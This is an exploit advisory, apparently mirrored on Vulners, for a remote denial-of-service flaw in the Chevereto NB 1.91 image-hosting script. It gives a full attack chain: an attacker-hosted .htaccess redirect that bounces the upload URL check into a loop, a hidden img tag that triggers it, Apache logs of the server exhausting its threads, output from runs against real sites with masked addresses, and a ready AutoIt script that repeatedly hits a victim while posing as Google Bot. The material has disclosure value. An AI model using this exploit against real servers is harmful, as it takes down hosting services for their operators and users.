Vulners
Lucene search
Chevereto nb1.91 Denial Of Service
`========================================================================================
Vulnerable Software: chevereto_nb1.91
Downloaded from: http://code.google.com/p/chevereto/downloads/list
(http://code.google.com/p/chevereto/downloads/detail?name=chevereto_nb1.91.zip&can=2&q=)
Official site: http://chevereto.com/
chevereto_nb1.91.zip Nightly Build 1.91 Featured Oct 2010 471 KB 32167
========================================================================================
About software:See from vendor: http://chevereto.com/
chevereto is outstanding Image Hosting Script (c) chevereto.com
========================================================================================
Vuln Desc: chevereto_nb1.91 is prone to remote Denial Of Service Vuln.
The main problem in that this image upload script doesn't uses any unique validating technique for per request when proceeding
$_GET['url'] (remote url)
Simply this means it handles remote file checking procedure like below:
http://192.168.0.15/learn/chevereto/chevereto_nb1.91/Upload/?url=http://somesite.tld/somevalidimage.png
Script will check is remote file valid image? Sounds safe yeah?
Lets look which function is responsible to this operation:
//engine.php
// FX Filtro (REMOTO)
function checkremota($rup) {
if(isValidURL($rup)) {
$info = getimagesize($rup);
if(!empty($info)) {
return true;
} else {
return false;
}
} else {
return false;
}
}
But we can trick it to act as something like infinitive loop :)
Here is main algo to exploit this vuln:
HOST B is attacker.In eg: http://somesite.tld/
HOST A is victim:In eg: http://192.168.0.15/
Attacker (HOST B) creates simply this .htaccess file and uploads it to his/her site.
.htaccess
#I'm attacker and i'm on host B. BTW, We can call it as "Bouncer" #
Redirect 301 /fake.png http://HOST_A_OR_VICTIM/Upload/?url=http://somesite.tld//fake.png
As you can see http://somesite.tld//fake.png (fake.png) it doesn't exist and it is not neccessary.
Then attacker uses same "malicious" url which he/she created in his .htaccess file.
In eg attacker injects it to anothers sites like image:(It simply will act as "detonator" to start this attack)
<img src="http://HOST_A_OR_VICTIM/Upload/?url=http://somesite.tld/fake.png" heigth="0" width="0" />
Thats all! See what it does on remote site (From Apache access logs)
192.168.0.15 - - [10/May/2012:17:55:55 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 -
192.168.0.15 - - [10/May/2012:17:55:55 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 - "-" "-"
192.168.0.15 - - [10/May/2012:17:57:55 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:17:57:55 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:55:56 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 -
192.168.0.15 - - [10/May/2012:17:55:56 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 - "-" "-"
192.168.0.15 - - [10/May/2012:17:57:56 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:17:57:56 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:55:56 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 -
192.168.0.15 - - [10/May/2012:17:55:56 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 - "-" "-"
192.168.0.15 - - [10/May/2012:17:57:56 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:17:57:56 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:55:56 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 -
192.168.0.15 - - [10/May/2012:17:55:56 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 - "-" "-"
192.168.0.15 - - [10/May/2012:17:57:56 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:17:57:56 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:58:47 +0400] "GET //fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:17:58:47 +0400] "GET //fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:58:47 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:17:58:47 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:58:47 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:17:58:47 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:58:47 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:17:58:47 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:58:47 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:17:58:47 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.1 - - [10/May/2012:17:58:47 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15//fake.png HTTP/1.1" 200 -
192.168.0.1 - - [10/May/2012:17:58:47 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15//fake.png HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0"
192.168.0.15 - - [10/May/2012:17:58:47 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 -
192.168.0.15 - - [10/May/2012:17:58:47 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 - "-" "-"
192.168.0.15 - - [10/May/2012:18:00:48 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:18:00:48 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.1 - - [10/May/2012:18:00:48 +0400] "GET /favicon.ico HTTP/1.1" 404 46
192.168.0.1 - - [10/May/2012:18:00:48 +0400] "GET /favicon.ico HTTP/1.1" 404 46 "-" "Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0"
192.168.0.15 - - [10/May/2012:17:58:47 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 -
192.168.0.15 - - [10/May/2012:17:58:47 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 - "-" "-"
192.168.0.15 - - [10/May/2012:17:58:47 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 -
192.168.0.15 - - [10/May/2012:17:58:47 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 - "-" "-"
192.168.0.1 - - [10/May/2012:18:00:48 +0400] "GET /favicon.ico HTTP/1.1" 404 46
192.168.0.1 - - [10/May/2012:18:00:48 +0400] "GET /favicon.ico HTTP/1.1" 404 46 "-" "Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0"
192.168.0.15 - - [10/May/2012:18:00:48 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:18:00:48 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:58:47 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 -
192.168.0.15 - - [10/May/2012:17:58:47 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 - "-" "-"
192.168.0.15 - - [10/May/2012:17:58:47 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 -
192.168.0.15 - - [10/May/2012:17:58:47 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 - "-" "-"
192.168.0.15 - - [10/May/2012:18:00:48 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:18:00:48 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 -
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 - "-" "-"
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 -
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 - "-" "-"
192.168.0.15 - - [10/May/2012:18:00:48 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:18:00:48 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 -
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 - "-" "-"
192.168.0.15 - - [10/May/2012:18:00:48 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:18:00:48 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 -
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 - "-" "-"
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 -
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 - "-" "-"
192.168.0.15 - - [10/May/2012:18:00:49 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:18:00:49 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 -
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 - "-" "-"
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 -
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 - "-" "-"
192.168.0.15 - - [10/May/2012:18:00:49 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:18:00:49 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 -
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 - "-" "-"
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 -
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 - "-" "-"
192.168.0.15 - - [10/May/2012:18:00:49 +0400] "GET /fake.png HTTP/1.0" 301 301
192.168.0.15 - - [10/May/2012:18:00:49 +0400] "GET /fake.png HTTP/1.0" 301 301 "-" "-"
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 -
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 - "-" "-"
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 -
192.168.0.15 - - [10/May/2012:17:58:48 +0400] "GET /learn/chevereto/chevereto_nb1.91/Upload/?url=http://192.168.0.15/fake.png HTTP/1.0" 200 - "-" "-"
While testing it (localhost machine)
CPU LOAD 100%
Apache is down.Because:
[Thu May 10 17:58:58 2012] [warn] Server ran out of threads to serve requests. Consider raising the ThreadsPerChild setting.
In other words this script can act as something like "tennis ball" to create Denial of Service conditions on hostings.
Exploiting on real site which uses chevereto_nb1.91:
For security reasons IP addresses and domain names is not published here.
[email protected]~
$ wget http://site1/fake.png
--2012-05-10 21:20:09-- http://site1/fake.png
Resolving site1 (site1)... 195.250.**.**
Connecting to site1 (site1)|195.250.**.**|:80... connected.
HTTP request sent, awaiting response... 301 Moved Permanently
Location: http://site2/?url=http://site1/fake.png [following]
--2012-05-10 21:20:11-- http://site2/?url=http://site1/fake.png
Resolving site2 (site2)... 95.1**.***.***
Connecting to site2 (site2)|95.1**.***.***|:80... connected.
HTTP request sent, awaiting response... 500 Internal Server Error
2012-05-10 21:22:20 ERROR 500: Internal Server Error.
[email protected]~
$ wget http://site2/?url=http://site1/fake.png
--2012-05-10 21:24:03-- http://site2/?url=http://site1/fake.png
Resolving site2 (site2)... 95.1**.***.***
Connecting to site2 (site2)|95.1**.***.***|:80... connected.
HTTP request sent, awaiting response... Read error (Connection reset by peer) in headers.
Retrying.
============================================================
NOTE0:Also i found script called *Imagise 1.11.29, based on Chevereto NB* which uses chevereto_nb1.91 engine.php.It is also vulnerable to this vuln.
============================================================
NOTE1:Previous versions seems is not vulnerable.At least i remotely from scratch checked against Chevereto NB1.6 rev2 it is not exploitable(not vulnerable).
============================================================
The following Proof Of Concept Exploit is available:
========================= EXPLOIT===========================
====chevereto_nb1.91 Remote Denial of Service Exploit=======
#NoTrayIcon
#cs
Name DOS.au3
Autoitscript file.
#ce
$victimsite='http://victim.tld/';//victim site.
$attackersite='http://attacker.tld/fake.png';// notice your fake.png +it is attackers site.
;# do not change especially $aux #
$aux='?url=';
While 1
Sleep(Random(3000,8000,1));// in random manner (minimum 3 - max 8 seconds).
;HttpSetProxy(2,'localhost:9049'); // if you want to use proxy uncomment it+change it to your needs.
HttpSetUserAgent('Google Bot');//Our user agent
$get=InetGet($victimsite & $aux & $attackersite,'',1);//our request
InetClose($get);//closing connection.
WEnd
=========================EOF EXPLOIT=========================
============================================================
NOTE2:
Got responce from From Vendor of this script: NB is discontinued and *no longer developed*
You can read the notice right here: http://code.google.com/p/chevereto/ and
the original post is here: http://chevereto.com/forums/post7400.html#p7400
============================================================
My sincerely apogolises Guys to resubmit this script's vulns again.Because after looking to code more closer i
imaged to find it(new vuln) and imaged how to exploit it.
Anyways,my sincerely Thanks to packetstormsecurity.org's staff.
Respect)
++++As always My Special Thanks to:++++
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com &&
to all AA Team &&+ to all
Azerbaijani Black Hatz;)
++++++++++++++++++++++++++++++++++++++++
Thank you.
/AkaStep ^_^
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
10 May 2012 00:00Current